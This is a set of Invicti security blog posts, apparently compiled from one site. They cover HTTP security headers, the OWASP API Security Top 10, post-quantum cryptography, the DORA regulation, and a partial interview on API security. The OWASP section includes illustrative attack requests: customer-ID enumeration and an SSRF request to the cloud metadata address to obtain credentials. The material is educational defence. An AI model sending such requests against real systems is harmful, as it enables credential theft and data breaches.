HTTP security headers: An easy way to harden your web applications
https://www.invicti.com/blog/web-security/http-security-headers/

Modern browsers and web servers support many HTTP headers that can greatly improve web application security to protect against clickjacking, cross-site scripting, and other common types of attacks. This post provides an overview of best-practice HTTP security headers that you should be setting in your websites and applications and shows how to use DAST to make sure you’re doing it right.

What are HTTP security headers?

HTTP security headers are the subset of HTTP headers, exchanged between a client (such as a web browser) and a server, that define the security properties of HTTP communication. They include dedicated security headers as well as several others that indirectly affect privacy and security.

Setting the right security headers in your web application, API, and web server settings can greatly improve the resilience of your applications against entire classes of attacks, including cross-site scripting (XSS) and clickjacking attacks. This post highlights the most important headers and shows how to use tools such as DAST to automatically check for their presence and correctness. For an in-depth discussion of available security headers, see our white paper on HTTP security headers.

How HTTP security headers improve your web application security posture

In the realm of web application security testing, vulnerabilities are usually understood to be exploitable security flaws that originate in application code and need to be fixed there. That typically means fixing one vulnerability in one app, often in just one place in that app.

HTTP security headers operate at the runtime level and provide a much broader layer of security. By restricting behaviors permitted by the browser and server once the web application is running, security headers can block entire classes of attacks, which makes them extremely powerful. Implementing the right headers in the right way is a crucial aspect of any best-practice application setup—but first you need to choose the ones that make the biggest difference, and then you need to implement and test them all across your application environment to balance security and functionality.

Keeping your HTTP security headers healthy with DAST

As with other web technologies, HTTP protocol headers come and go depending on current specifications and browser vendor support. Security research, in particular, moves much faster than official tech standards, so de facto standards can arise and fall out of favor quite independently of the official specs. Headers that were widely supported a few years ago are deprecated today and replaced by something else. That’s a lot to keep up with.

On top of that, security headers can be set in server config but also in the application itself. In a large app environment with hundreds of servers running thousands of sites, applications, and APIs, manually checking and maintaining security headers everywhere they’re being set is completely unrealistic. Fortunately, that’s a natural job for automated vulnerability scanners. Leading tools such as Invicti’s DAST solutions will automatically check for the presence and correctness of HTTP security headers, providing clear recommendations according to current security best practices.

The most important HTTP security headers

First up are the two best-known HTTP response headers that any modern web application will be setting. Apart from ruling out entire classes of web attacks, both are now also a practical necessity.

Strict-Transport-Security

The HTTP Strict Transport Security header (HSTS) is set on the server and enforces the use of encrypted HTTPS connections instead of plain-text HTTP communication. A typical HSTS header might look like this:

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

This informs visiting web browsers that the site along with all its subdomains only communicates over SSL/TLS and the browser should only access it over HTTPS for the next two years (the max-age value in seconds). The preload directive indicates that the site is present on a global list of HTTPS-only sites. The purpose of preloading is to speed up page loads and also eliminate the risk of man-in-the-middle (MITM) attacks when a site is visited for the first time without encryption.
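
Exactly where you set the header depends on your stack. As a rough illustrative sketch (the values mirror the example above), in an nginx server block you might add:

add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;

while the equivalent for Apache httpd (with mod_headers enabled) would be:

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload"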

Invicti’s DAST scanner checks if HSTS is enabled and correctly configured.

Content-Security-Policy

The Content Security Policy header (CSP) is the Swiss Army knife of HTTP security headers. It lets you precisely control permitted content sources and many other content parameters. Because you can also limit script sources, it is the recommended way to protect your sites and applications against XSS attacks. Here’s a basic CSP header that only allows assets from the local origin:

Content-Security-Policy: default-src 'self'

Some of the other directives include script-src, style-src, object-src, and img-src to specify permitted sources for scripts, CSS stylesheets, objects, and images, respectively. For example, if you specify script-src 'self', you are restricting scripts to the local origin but can still load other content from external origins.
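
As an illustration of combining directives, a policy that allows scripts and styles only from the local origin, also permits images from a CDN (cdn.example.com is just a placeholder here), and blocks plugin content entirely might look like this:

Content-Security-Policy: default-src 'self'; img-src 'self' https://cdn.example.com; object-src 'none'

Real policies should be tested carefully before deployment, since an overly strict CSP can break legitimate functionality.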

Invicti’s DAST scanner checks if the CSP header is present.

Other HTTP security headers

While not as critical to implement as CSP and HSTS, the additional headers below can also help you harden your web applications with relatively little effort (at least compared to getting the same effect purely in application code).

X-Content-Type-Options

When included in server responses, this header forces web browsers to strictly follow the MIME types specified in Content-Type headers instead of trying to guess the content type by sniffing the response. This protects websites from cross-site scripting attacks that abuse MIME sniffing to deliver malicious code masquerading as a non-executable MIME type. The header has just one directive to block sniffing:

X-Content-Type-Options: nosniff

Invicti’s DAST scanner checks if Content-Type headers are set and X-Content-Type-Options: nosniff is present.

Headers related to cross-origin resource sharing (CORS)

Many web apps need to work with some external resources that require exceptions to the default same-origin policy (SOP) settings applied by modern browsers. Several headers exist that let you selectively relax SOP restrictions without compromising overall security:

  • Access-Control-Allow-Origin: Specifies which origins are permitted for cross-origin access. The value can be a specific origin (which the server can vary per request) or * to allow any site to read the resource.
  • Cross-Origin-Opener-Policy (COOP): Specifies whether a top-level document can share browsing context with cross-origin documents. Use same-origin to disallow such access.
  • Cross-Origin-Resource-Policy (CORP): Specifies domains that are permitted to include the current resource. Use same-site to disallow all external origins.
  • Cross-Origin-Embedder-Policy (COEP): As for CORP but specifically related to embedding resources on the current page. Use require-corp to only embed resources from origins permitted by the CORP header.
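
To make this concrete, a response for an API meant to be consumed only by one trusted front end (app.example.com is a hypothetical origin here) might carry:

Access-Control-Allow-Origin: https://app.example.com
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-site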

Note that in practice, there will be overlap between these and other security headers and, in many cases, there will be more than one way to get the result you need.

Fetch metadata headers

This relatively young set of client-side headers allows the browser to inform the server about the context in which each HTTP request was made. Four headers currently exist:

  • Sec-Fetch-Site: Specifies the intended relationship between the initiator and target origin
  • Sec-Fetch-Mode: Specifies the intended request mode
  • Sec-Fetch-User: Specifies if the request was triggered by the user
  • Sec-Fetch-Dest: Specifies the intended request destination

When supported by both the server and the browser, these headers give the server additional context on intended application behaviors and business logic to help identify and block suspicious requests.
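
For instance, when a user clicks a regular link on another site that leads to your page, a supporting browser might send something like:

Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document

A server could then reasonably reject, say, a request marked Sec-Fetch-Site: cross-site that targets an endpoint only ever called from the application’s own pages; exact policies will depend on the application.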

Related HTTP headers to improve privacy and security

These final items are not strictly HTTP security headers but do provide additional control over data security and privacy.

Referrer-Policy

Controls how much referrer information the browser should reveal to the web server (if any). Typical usage is:

Referrer-Policy: origin-when-cross-origin

With this setting, the browser will only reveal full referrer information (including the URL) for same-origin requests. For all other requests, only the origin will be shared.

Invicti reports missing Referrer-Policy headers with a Best Practice severity level.

Cache-Control

Lets you control caching for specific web pages. Many directives are available, but the most common usage is simply:

Cache-Control: no-store

This prevents any caching of the server response, which can be useful for ensuring that confidential data is not retained in any caches. You can use other available directives to fine-tune the desired caching behavior, including expiration time.
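
For example, a response that may be cached privately by the browser for ten minutes but never by shared proxies could be served with (values are illustrative):

Cache-Control: private, max-age=600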

Clear-Site-Data

To ensure that confidential information from your application is not stored by the browser after a user logs out, you can set the Clear-Site-Data header:

Clear-Site-Data: "*" 

This value will clear all browsing data related to the site. The cache, cookies, and storage directives are also available to give you more fine-grained control over what is cleared. Note this header is not universally supported.
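
For instance, to clear only cached content and cookies on a logout response while leaving other storage intact, you might send:

Clear-Site-Data: "cache", "cookies"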

Permissions-Policy (previously Feature-Policy)

Allows you to define permissions for specific browser features and APIs on the current page. It can be used to control application functionality, but the main use case is to restrict access to privacy-related features like microphone, camera, or geolocation APIs. To disallow access to all three of these, specify:

Permissions-Policy: microphone=(), camera=(), geolocation=()

Several dozen directives are available—see the Permissions-Policy documentation on MDN for a full list.
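
Directives can also grant rather than deny access. For example, a policy allowing geolocation only for the page’s own origin and one trusted embed (maps.example.com is a hypothetical origin) might read:

Permissions-Policy: geolocation=(self "https://maps.example.com")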

Examples of deprecated HTTP security headers

As already mentioned, it was common in the past for dominant browsers to introduce new headers as temporary fixes for specific security issues. As web technologies became more standardized and organized, many of these were deprecated, often after only a few years. While they shouldn’t be used in modern applications, these deprecated headers give a fascinating insight into the history and relentless pace of changes in web technology.

(Deprecated) X-Frame-Options

The X-Frame-Options header was introduced way back in 2008 in Microsoft Internet Explorer to provide protection against clickjacking attacks involving HTML iframes before more standardized headers were adopted. To completely prevent the current page from being loaded into iframes, you would specify:

X-Frame-Options: deny

Another useful value was X-Frame-Options: sameorigin to only allow the page to be loaded into iframes on the same origin. You could also specify allow-from followed by a specific URL to permit framing only from that location. This header has been deprecated since the adoption of the frame-ancestors CSP directive to control iframe security.
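
For comparison, the modern CSP equivalent of the sameorigin behavior would be something like:

Content-Security-Policy: frame-ancestors 'self'

while frame-ancestors 'none' corresponds to the old deny value.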

(Deprecated) X-XSS-Protection

As the name suggests, the X-XSS-Protection header was introduced to protect against JavaScript injection attacks, i.e. cross-site scripting. The usual syntax was:

X-XSS-Protection: 1; mode=block

Created for browsers equipped with XSS filters, this non-standard header was intended as a way to control that filtering functionality. Modern browsers no longer use XSS filtering due to the many possibilities of XSS filter evasion, so this header is now deprecated, making CSP directives your main XSS defense.

(Deprecated) Public-Key-Pins

HTTP Public Key Pinning (HPKP) was introduced in Google Chrome and Firefox to counteract certificate spoofing. HPKP was a complicated mechanism that involved the server presenting clients with cryptographic hashes of valid certificate public keys for future communication. A typical header would be something like:

Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; max-age=5184000 

In practice, public key pinning proved too complicated to use. Worse, if configured incorrectly, the header could completely disable website access for the time specified in the max-age parameter (two months, in the example above). The header was deprecated in favor of certificate transparency logs and the Expect-CT header—but that one didn’t last long, either…

(Deprecated) Expect-CT

With HPKP gone, the recommended way to prevent website certificate spoofing was to use the Expect-CT header to indicate that only new certificates added to Certificate Transparency logs should be accepted. This proved another dead end, and Mozilla now recommends avoiding the header and removing it wherever possible. A typical header looked something like this:

Expect-CT: max-age=86400, enforce, report-uri="https://example.com/report" 

The enforce directive instructed clients to refuse connections that violate the Certificate Transparency policy. The optional report-uri directive indicated a location for reporting connection failures.

Security headers in action with Sven Morgenroth

It’s one thing to read about security headers, but seeing them in action gives you a whole new appreciation of how they work (and when they don’t). Invicti Staff Security Engineer Sven Morgenroth joined Paul Asadoorian on Paul’s Security Weekly #652 to describe and demonstrate various HTTP headers related to security. Watch the full video interview and demo:

Keep track of your HTTP security headers with Invicti

HTTP security headers can be an easy way to improve web security and often don’t require changes to the application itself, so it’s always a good idea to use the most current headers. However, because browser vendor support for HTTP headers can change so quickly, it’s hard to keep everything up-to-date, especially if you’re working with hundreds of websites. 

To help you keep up and stay secure, Invicti provides vulnerability checks that include testing for recommended HTTP security headers and other misconfigurations. Invicti checks if a header is present and correctly configured, and provides clear recommendations to ensure that your web applications always have the best protection.

Start testing for security misconfigurations today

 


Frequently asked questions

What are the main HTTP security headers for improving website security?

The two most important security headers are Content-Security-Policy (CSP) to define permitted content sources and Strict-Transport-Security (HSTS) to enforce HTTPS connections. It’s also common to set X-Content-Type-Options to prevent MIME type sniffing by browsers.
 
Read our detailed white paper on HTTP security headers.

How do HTTP security headers improve web application resilience?

HTTP security headers play a crucial role in web security by mitigating risks associated with common attacks such as cross-site scripting (XSS), frame injection, and clickjacking. When set up correctly, they allow website owners to prevent entire classes of web application attacks already at the configuration level.
 
Learn more about cross-site scripting vulnerabilities and attacks.

How can website owners implement and configure HTTP security headers to improve their web security posture?

To effectively implement and configure HTTP security headers, both website owners and developers need to understand the place and purpose of each header and apply configurations tailored to their specific security requirements. This involves setting response headers on the web server (though some can also be set in application code) and then regularly testing for header misconfigurations using an automated scanner.
 
Learn how to set up Content-Security-Policy (CSP) headers and how they work.

The OWASP API Security Top 10 demystified
https://www.invicti.com/blog/web-security/owasp-api-security-top-10-demystified/

Dazed and confused by the OWASP API Security Top 10 categories? We decided to break them down into plain language to have a bit of fun but also to better appreciate the core problems hiding behind the precise technical definitions.

Useful as they are, OWASP Top 10 lists are not renowned for being clear and readable, and definitely not for being fun. While we do have a serious post discussing the methodology, categories, and missed opportunities of the OWASP API Security Top 10 for 2023, this time we thought we’d take a more light-hearted look at the big ten for APIs. And this is not (just) goofing around—by cutting through the precise formal language, we can hopefully get a better feel for each API risk category.

API risk #1: Ask and you shall receive

API1:2023 Broken Object-Level Authorization (aka BOLA aka IDOR)

The whole point of APIs is to provide automated access to application data and functionality. Setting up an API endpoint to serve up the details of a customer account is easy—the big challenge is to make sure that data is only accessible to authorized users and systems. If something (the “object”) in your app can be freely accessed by anyone just because they know how to request the right URL and object ID (like a customer number), you get data breaches like the Optus hack.
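
As a sketch (the endpoint and IDs here are hypothetical), a BOLA-vulnerable API is one where any caller can walk through records simply by changing the object ID:

GET /api/v1/customers/10001
GET /api/v1/customers/10002
GET /api/v1/customers/10003

If each request returns another customer’s details without the server checking that the caller is authorized for that specific object, enumerating the entire data set is just a loop away.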

API risk #2: You don’t need to see his identification

API2:2023 Broken Authentication

With APIs, as in life, proving your identity is the first thing you should be asked to do before doing anything important. If this authentication mechanism is weak or easy to bypass, malicious actors can get in with no questions asked, using methods ranging from credential stuffing and brute-forcing to tampering with JWT tokens to bypass signature verification. And once they are in, the remaining top 9 risks are up for grabs.

API risk #3: Promise me you won’t look inside

API3:2023 Broken Object Property-Level Authorization

With most business applications, it’s pretty obvious that different users need different levels of data access. If you have a customer account in the system, some of your staff may only need basic contact information, others will also be trusted with financial information, while an admin user may have access to everything plus credential management. Enforcing this for API access is especially difficult, leading to situations where an attacker who gets access to a customer account object also gets access to all the data for that account.
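
For a hypothetical illustration, an endpoint that returns the full customer object to any authenticated caller leaks properties that only some roles should see:

{ "id": 10001, "name": "A. Customer", "email": "ac@example.com", "creditLimit": 50000, "isAdmin": false }

Property-level authorization means filtering fields like creditLimit or isAdmin per caller, not just deciding access to the object as a whole.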

API risk #4: I don’t expect you to talk, Mr. API. I expect you to die

API4:2023 Unrestricted Resource Consumption

Data breaches tend to make more headlines, but attackers don’t always need your API to talk—knocking it offline along with the whole app is often enough. Denial of service (DoS) attacks are among the crudest yet most common ways to target an API, made all the easier by APIs being specifically designed for silent and automated access. Accepting and processing every incoming request without enforcing any limits leaves an API vulnerable to resource exhaustion and its owner exposed to excessive operating costs.

API risk #5: Are they allowed to do that?

API5:2023 Broken Function-Level Authorization

API endpoints expose not only data but also operations on that data. While risk #3 was about attackers getting all-or-nothing access to data objects, the same applies to permitted operations. REST APIs, in particular, commonly expose methods including GET, PUT, and DELETE. If anybody who can read data through a regular GET request is also able to delete it just by changing GET to DELETE in the request line, you are clearly asking for trouble. The same goes for unsecured access to things like admin operations.

API risk #6: Hey, that’s cheating!

API6:2023 Unrestricted Access to Sensitive Business Flows

Abusing automated access to certain operations might have serious business consequences, even when it’s not technically a security risk. Common examples include automatic auction bidding, buying out and then reselling high-demand items like tickets, or flooding a reservation system with requests to deny it to legitimate users. So while it might not knock the service offline like a DoS, it can certainly cause business disruption and material losses. Plus it’s cheating.

API risk #7: Give them a fake address; they never check anyway

API7:2023 Server-Side Request Forgery (SSRF)

Fetching resources from an external site is a common practice in web development. When working through APIs, it is equally common to get the specific resource address (URL) from an incoming request. Without careful validation to catch any unexpected data in that URL, an attacker could send you the URL of a malicious external resource, including malicious code. Even worse, they could also request a sensitive internal resource—and because the request is coming from your API server, they could indirectly access internal systems via your API.
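
A classic sketch of the problem (the endpoint is hypothetical): say an API exposes GET /api/v1/fetch?url=https://example.com/logo.png and retrieves whatever URL it is given. Without validation, an attacker could instead request:

GET /api/v1/fetch?url=http://169.254.169.254/latest/meta-data/

On some cloud platforms, that internal instance metadata address can return credentials, which your own API then helpfully serves back to the attacker.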

API risk #8: Amazing, that’s the same code I have on my luggage!

API8:2023 Security Misconfiguration

Setting up a production API to work correctly is not easy, and making it secure is even harder. Even a single security misconfiguration anywhere in this multi-layered technology puzzle could leave attackers with a way to access API data or operations. Examples include unpatched products or software components anywhere in the tech stack, excessive permissions at any level of that stack (especially for cloud storage permissions), and weak security (such as gaps in encryption) at any stage of API request processing.

API risk #9: New building, same unlocked fence gate

API9:2023 Improper Inventory Management

When an API changes, it’s common practice to set up the new version alongside the old one to make sure existing systems that rely on that API still work until the transition is complete. Without careful inventory management, those old APIs can easily be overlooked and forgotten, remaining accessible to attackers. And because they are old and abandoned, they are less likely to include the latest security updates and might not be monitored and protected to the same level as production APIs, giving malicious actors plenty of time and opportunity to find a way in. This is why API discovery is such a big deal.

API risk #10: It’s always a friend of a friend that causes trouble

API10:2023 Unsafe Consumption of APIs

For the most part, APIs don’t interact with humans but with other APIs—and those, by design and unlike humans, should behave according to spec. This may create a sense of implicit trust, leading developers to unquestioningly accept and pass on data from a familiar third-party API, especially one operated by a well-known company. If attackers compromise that API or manage to slip malicious data into one of its data sources, blindly trusting results received from that API could leave your own application vulnerable or compromised.

Final thoughts: Are you talking to me?

When put into everyday language, many of the top 10 API-related security risks might seem simple, even mundane—mostly different ways of letting attackers access things they clearly have no business accessing. The challenge with APIs is that they act as shortcuts to the internals of your application. Unless those shortcuts are carefully planned from the earliest stages of application design and development, they can bypass access controls that might be present in the application.

It’s always tempting to treat any OWASP Top 10 as a security checklist, but the goal of the API Security Top 10 is clearly stated in its introduction: “to educate those involved in API development and maintenance, for example, developers, designers, architects, managers, or organizations.” You’ll note that security folks aren’t listed—because API security really starts way before they come in with testing and protection.

The main takeaway from the OWASP API Security Top 10 is that, in a perfect world, secure APIs should always start with secure application design. In the real world, though, APIs are rarely perfectly designed, implemented, or tracked, so tools for API discovery and API security testing are a vital part of any application security toolbox.

Learn more about Invicti API Security and check out our free (and ungated) white paper: API Vulnerability Testing in the Real World.

What’s the big deal with post-quantum cryptography?
https://www.invicti.com/blog/web-security/whats-the-deal-with-post-quantum-cryptography-pqc/

Even though usable quantum computers don’t exist yet, they could (if built) be used to break today’s standard encryption methods. To guard against this potential threat, NIST has developed and published several standards for post-quantum cryptography (PQC). This post examines why PQC is needed and how it will be implemented.

If you follow IT and cybersecurity news, you’ll be familiar with mentions of quantum computing, usually followed by something about post-quantum cryptography. In fact, just recently, NIST announced the formal approval of the first set of PQC standards, which will doubtless fuel more quantum apocalypse predictions in the news. Let’s take a very high-level look at all this quantum cryptography stuff to see what the fuss is about, what it all means in practice, and who will be affected by PQC migrations.

A very brief intro to cryptography (and breaking it)

Cryptography is the foundation of data privacy, especially on the web. Seeing https:// or a padlock in your address bar is a basic indicator that your connection is secured by encryption, meaning all the data you send and receive is scrambled using a cipher that only you and the recipient can decipher. Assuming everything is set up correctly, the only way to get at the original data is to break whatever cipher is being used. And even though they don’t yet exist outside of tiny experimental systems, quantum computers may, in theory, offer a way to break several fundamental modern ciphers.

That’s where the big scary stories originate—if somebody could build a working quantum computer, they might (in theory) be able to decrypt any communications sent on the modern web. While nobody has managed to build a practically usable quantum computer, and it’s not completely certain if that’s even possible, the mere theoretical possibility was enough to start a search for encryption methods that could resist such potential quantum attacks. Why the panic, you may wonder?

Getting quantum on decryption

When you connect to a site or app over HTTPS, your browser (app, phone, car, smart TV, router, you get the picture) and the server at the other end have to securely agree on how they will encrypt their communication and what encryption key to use. After that’s decided, they both have a secret key to encrypt their messages using whatever method they’ve negotiated. This part is called symmetric encryption (because they both use the same key) and is not vulnerable to quantum attacks.

The really critical and difficult part—and also the one that’s vulnerable—is securely encrypting and exchanging that key. This is done using public-key (asymmetric) cryptography based on one of several mathematical problems known to be extremely difficult (aka impractically slow) to solve. For existing schemes like RSA or Diffie-Hellman, doing the calculations to find a single key of secure length would take thousands of years using even the most powerful supercomputer. Except these problems are only difficult for a traditional computer—not a quantum one.

For this tiny specialized subset of problems, a full-scale quantum computer could be orders of magnitude faster than a traditional one and thus potentially provide a way to break the asymmetric part of encrypted communications to grab the secret symmetric key that decrypts your data. The same principle could be used to decrypt stored data gathered in the past or even forge digital signatures, wreaking havoc across the chains of trust that underpin our entire digital world. Even if the risk is still hypothetical, it was clearly a good idea to start thinking ahead for something better.

How a quantum computer could break public-key cryptography

A traditional computer is basically billions of on/off switches doing basic arithmetic really, really fast using ones and zeros. A quantum computer is built from subsystems called qubits where instead of just being on or off, each qubit can exist in a combination of states, additionally linked to the states of all the other qubits through quantum effects.

 

Using an approach called Shor’s algorithm, you can program a quantum computer to do certain calculations that can be used to break public-key encryption. Assuming the quantum computer works without errors or noise (and is big enough, and exists in the first place), these calculations would be much faster than on a traditional computer because all the qubits act together to check many solutions at once rather than doing individual arithmetic operations.
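
To give a flavor of the math (a toy example, not how real key sizes behave): Shor’s algorithm reduces factoring a number N to finding the period r of the function f(x) = a^x mod N. Take N = 15 and a = 7. The powers of 7 mod 15 run 7, 4, 13, 1 and then repeat, so the period is r = 4. Computing gcd(7^(r/2) − 1, 15) = gcd(48, 15) = 3 and gcd(7^(r/2) + 1, 15) = gcd(50, 15) = 5 recovers the factors 3 × 5 = 15. The quantum speedup lies entirely in finding that period for numbers hundreds of digits long.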

NIST standards for post-quantum cryptography algorithms

Cryptographic practice works on the assumption that a theoretical weakness today could render an algorithm practically insecure tomorrow. Given what was known about the susceptibility of public-key cryptography to quantum decryption, the National Institute of Standards and Technology (NIST) was given the job of coordinating work on developing and standardizing replacement algorithms that would resist attacks using quantum computers.

After several years and multiple drafts, in August 2024, NIST published the final versions of three major PQC algorithms, each becoming an official Federal Information Processing Standard (FIPS):

  • FIPS 203 (ML-KEM): a module-lattice-based key encapsulation mechanism derived from CRYSTALS-Kyber, intended as the primary standard for general encryption
  • FIPS 204 (ML-DSA): a module-lattice-based digital signature algorithm derived from CRYSTALS-Dilithium
  • FIPS 205 (SLH-DSA): a stateless hash-based digital signature algorithm derived from SPHINCS+, intended as a backup to ML-DSA

A fourth standard, FIPS 206 (FN-DSA, based on the FALCON algorithm), is also in the works and should be finalized towards the end of 2024.

What does PQC mean in practice?

The entire web infrastructure was built around public-key cryptography as the foundation of trust and security, so swapping out those algorithms without breaking the internet will be no small undertaking. While nobody is setting a specific date, organizations such as CISA are leading the transition toward PQC, starting with critical infrastructure.

All this will happen under the hood of existing systems, so it should not directly affect end users, but it will mean a lot of work for everyone involved in the transition. The Department of Homeland Security has laid out a roadmap for that transition, and CISA has a dedicated PQC initiative to help guide those efforts. It’s reasonable to expect that other regulatory and industry bodies will follow suit, setting long-term goals to entirely move away from potentially vulnerable public-key algorithms in favor of their quantum-resistant counterparts. Some organizations are already migrating voluntarily as a best practice.

It is clear to everyone that PQC migration is a precautionary and future-proofing measure rather than any urgent reaction to demonstrated existing threats. Cryptographic history has shown time and time again that if a theoretical weakness is found in an algorithm or its implementation, there’s a very good chance it will be practically exploited in the future. Add to that the wildcard of secret security agencies worldwide that could always be years ahead in terms of tools and resources and, suddenly, the PQC initiative makes a lot of sense as a proactive security measure, especially when it comes to protecting critical infrastructure and national secrets.

For a more detailed discussion of PQC and the practical challenges of migration, see two papers from the UK National Cyber Security Centre (NCSC): Preparing for quantum-safe cryptography and Next steps in preparing for post-quantum cryptography.

How the DORA framework mandates application security testing (and many other things)
https://www.invicti.com/blog/web-security/dora-framework-mandates-application-security-testing/

The DORA framework presents both challenges and opportunities for entities in the European Union and beyond, calling for improvements to cybersecurity efforts for financial institutions. But what is DORA exactly, and why is it so important to pay attention to this regulation? We broke it all down for you, including how Invicti can help.

The Digital Operational Resilience Act (DORA) is a European cybersecurity framework that was enacted in December 2022 and will be enforced starting in 2025. While created specifically to ensure the resilience of the European Union’s financial systems and institutions in the face of cyberattacks and other incidents involving ICT (information and communication technology), DORA applies not only to financial institutions but also to third-party providers of critical ICT services for the financial sector.

DORA vs. NIS2
The Network and Information Security Directive (NIS, currently NIS2) was the first piece of EU-wide cybersecurity legislation, aimed at ensuring a high common level of cybersecurity across EU member states. In contrast, DORA is focused specifically on operational resilience for the financial sector, thus complementing the more general security measures and controls specified in NIS2.

What is DORA?

DORA establishes a detailed and systematic regulatory framework for enhancing digital resilience and business continuity across the EU’s financial institutions in the face of mounting cyberattacks and other threats to availability and data integrity. Considering that modern financial systems are both entirely digital and heavily interconnected and interdependent, a common framework is crucial to minimize security risks, define region-wide ICT resilience levels, and enforce a unified system of oversight. The regulation states upfront that cybersecurity concerns span not only the entire sector but also external providers, supporting the case for an overarching EU-wide framework to ensure resilience:

Finance has not only become largely digital throughout the whole sector, but digitalisation has also deepened interconnections and dependencies within the financial sector and with third-party infrastructure and service providers.

DORA isn’t only for banks

It is estimated that DORA will apply to over 22,000 entities within the EU, covering not only financial institutions but also their ICT service providers. The scope is extremely wide, ranging from banks, investment firms, stock exchanges, and insurance companies to credit rating services, electronic money institutions, crowdfunding service providers, and many more.

The definition of ICT service provider is equally detailed, covering entities that provide “digital and data services provided through ICT systems to one or more internal or external users on an ongoing basis, including hardware as a service and hardware services which includes the provision of technical support via software or firmware updates by the hardware provider.” In other words, a wide variety of providers serving a wide variety of institutions will need to comply with DORA requirements.

While DORA is an EU regulation, ICT services often span the world, especially when it comes to cloud service providers. The framework takes this into account, explicitly allowing oversight to extend outside the Union:

Critical ICT third-party service providers should be able to provide ICT services from anywhere in the world, not necessarily or not only from premises located in the Union. (…) The Lead Overseer should therefore also be able to exercise its relevant oversight powers in third countries. Exercising those powers in third countries should allow the Lead Overseer to examine the facilities from which the ICT services or the technical support services are actually provided or managed by the critical ICT third-party service provider.

Three European Supervisory Authorities (ESAs) are charged with ensuring DORA compliance and helping to navigate its requirements: the European Banking Authority (EBA), the European Insurance and Occupational Pensions Authority (EIOPA), and the European Securities and Markets Authority (ESMA).

Key focus areas of DORA

  • ICT risk management: Financial entities must develop and maintain a comprehensive ICT risk management framework covering all aspects of ICT risk and resilience, from prevention and detection to response and recovery.
  • Incident reporting and management: DORA requires entities to promptly report ICT-related incidents to competent authorities, establish incident management processes, maintain detailed records of incidents, and conduct post-incident analyses.
  • Digital operational resilience testing: Crucially, DORA mandates operational resilience testing, including vulnerability scans and assessments, penetration testing, and gap analysis.
  • ICT third-party risk management: Contractual arrangements with third-party providers must include adequate cybersecurity measures for financial institutions, and regular audits and risk assessments are mandated to mitigate supply-chain risks.
  • Information sharing: Within their industry, financial organizations are required to exchange threat intelligence, define mechanisms to act on shared intelligence, and collaborate to enhance cybersecurity and resilience. 

Application security testing under DORA

Article 25 of DORA explicitly requires financial institutions to perform operational resilience testing of their ICT systems and tools, including vulnerability assessments and scans:

The digital operational resilience testing programme (…) shall provide (…) for the execution of appropriate tests, such as vulnerability assessments and scans, open source analyses, network security assessments, gap analyses, physical security reviews, questionnaires and scanning software solutions, source code reviews where feasible, scenario-based tests, compatibility testing, performance testing, end-to-end testing and penetration testing.

On top of that, centralized financial entities are specifically required to check for vulnerabilities before implementing any material change to their environments:

Central securities depositories and central counterparties shall perform vulnerability assessments before any deployment or redeployment of new or existing applications and infrastructure components, and ICT services supporting critical or important functions of the financial entity.

Considering that Article 26 then provides detailed requirements for obligatory threat-led penetration testing (TLPT), it is clear that DORA puts a heavy emphasis on regular and proactive testing to ensure financial organizations (and their ICT providers) are constantly evaluating the resilience of their applications and infrastructure.

How Invicti can help with DORA-mandated vulnerability scanning

The Digital Operational Resilience Act recognizes the interconnected and almost entirely digital nature of modern financial services, providing a comprehensive framework to minimize risk and maximize the resilience of the European financial sector in the face of mounting cyberattacks. 

With its test-driven platform for application and API security, including Predictive Risk Scoring and developer workflow integrations, Invicti can support financial institutions and their critical service providers in maintaining a proactive application security posture. Specifically, with continuous and accurate scanning solutions, Invicti helps solve requirements like those in Article 25 for performing vulnerability assessments before app deployment or redeployment. 

Want to see us in action? Get a demo here.  

A voyage of discovery: Talking APIs with Frank Catucci and Dan Murphy
https://www.invicti.com/blog/web-security/discovering-apis-interview-on-api-security/

API security is not just another box to tick but a critical part of any modern web application security program—if you can tame sprawl both for APIs and for the tools to find and test them. With Invicti now offering API discovery and vulnerability testing on a single platform, we sat down with Invicti’s CTO, Frank Catucci, and Chief Architect, Dan Murphy, to get the straight deal on API security directly from the experts.

What’s with all the buzz around API security? It’s becoming a top concern in application security as everyone looks for faster and more reliable ways to secure their ever-growing API ecosystems. In Postman’s 2023 State of the API Report, 92% of respondents said they planned to increase their investments in APIs through 2024, up from 89% the previous year. With API usage surging in software development, the line between APIs and applications is getting blurred, even as the security industry often treats them as completely separate things.

Invicti recently released API discovery as part of its API Security product to help companies proactively address API-related risks in their application environments—but how does it all work under the hood and what makes it so special? We sat down for an interview with Invicti’s CTO, Frank Catucci, and Chief Architect, Dan Murphy, to clear up some API misconceptions, get closer to the technical side of building API security into an application security platform, and learn why it’s so important to treat APIs not as a separate entity but as an integral part of your attack surface. 

Frank Catucci, CTO and Head of Security Research
Dan Murphy, Chief Architect

This might seem a very obvious question to start with, but we’re seeing a lot of confusion about the differences between web applications and APIs. Especially in the security industry, you see a lot of dedicated API security products and vendors, so it sometimes feels like applications and APIs are two separate things with different security requirements. So what’s your practitioner’s eye view on applications vs. APIs in terms of architecture and, of course, security?

Dan Murphy: I come from a software engineering background and have spent a lot of my career thinking about APIs and web applications. But for folks who don’t necessarily have the same background, it’s sometimes hard to visualize, so it’s valid to ask: What is an API? How does it differ from a web app? And the answer is those things are a little blurred. Many modern applications are single-page applications (SPAs) that are simply invoking APIs as the user clicks around the app, so they’re a kind of hybrid of GUI and API. But with a traditional API, the thing on the other end of the request is not the web browser—it’s a piece of code. It may be some other web service invoking a webhook, some backend code or systems talking to each other, but it’s definitely not a human clicking inside of a browser.

 

One of the metaphors I like to use is that APIs are like the service elevators in buildings—people coming in the front door don’t see them, but they carry a lot of cargo behind the scenes, in this case all the internals of a web app. They don’t have a GUI that you can see and interact with. As in a real physical building, because those service APIs stay out of sight, it might not be clear if they’re being maintained and updated and kept secure.

Frank Catucci: That’s a great metaphor—APIs are the part of an application that does the heavy lifting in terms of data access and processing, but because they often aren’t visible, they can slip through testing and inventory efforts. So when people ask me what’s so special about APIs and API security, I like to start with an example of an API-based attack, such as the Optus data breach. Now that one was only possible because of an exposed API endpoint that let an attacker download the data of over 10 million customers without any authorization or authentication. 

 

